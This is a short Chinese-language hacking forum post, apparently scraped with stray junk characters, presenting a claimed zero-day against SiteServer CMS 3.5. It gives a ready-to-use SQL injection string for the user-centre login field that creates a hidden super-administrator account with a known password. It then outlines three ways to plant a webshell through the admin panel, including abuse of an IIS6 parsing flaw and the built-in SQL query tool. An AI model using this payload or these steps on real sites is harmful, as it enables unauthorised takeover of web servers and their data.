SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
2 H( |* `: @& _+ q, S
9 E& A7 Y) P+ Y% @" \; `

1 ~% F* y' Z- N4 |EXP:

% j4 q7 N# O8 |5 F$ o直接访问UserCenter/login.aspx



用户名处输入：

, S. v! O. p  A% k! H3 P* E. @7 O123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
3 i3 x( h# j( l3 L$ `& [

; ^  a& r& F+ i1 U
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
( D# Z9 x2 P1 \6 |* n+ H( |

- X; a0 f  D" i  o5 P5 M
之后再访问后台SiteServer/login.aspx用插入的用户登陆

4 X  L2 U. ?) ]1 [4 N

) ]+ n$ v7 @+ k5 \# T0 p后台拿webshell的三种方法：

/ ~. r8 J0 w3 ]  I( y9 D$ k一、
' \8 A$ y4 {5 r( ]( A- ?
0 v+ A6 g$ x% A$ u" }站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
- T4 D7 A1 V3 y4 t
二、
0 [6 S7 Q5 l' ]: G) |
9 E  p" f# b8 X- K' K2 _- o成员权限-》添加用户-》用户名为：1.asp
; _; \8 U' k1 ?3 ^
http://127.0.0.1/usercenter/
' e2 v' y2 l4 ~* G  _+ z9 o" M
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
3 q  X* z; m: m: S' A) @
（ps：后台添加用户时不会验证是否含有非法字符）

1 M" E( |: t$ c) h0 r3 V三、
, ?4 p# G, Z) ?/ h: _, m' w
; F) Y0 C) W$ t) Q5 w8 j系统工具-》实用工具-》机器参数查看
8 w) U$ O; n. h9 E& g7 A可以看到数据库类型、名称，WEB路径

! M4 C8 E! K! c, ]系统工具-》数据库工具-》SQL语句查询
% ?$ H. ]& B: ]# r" v这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
4 J; t7 q+ \; S: {/ _3 p# H( E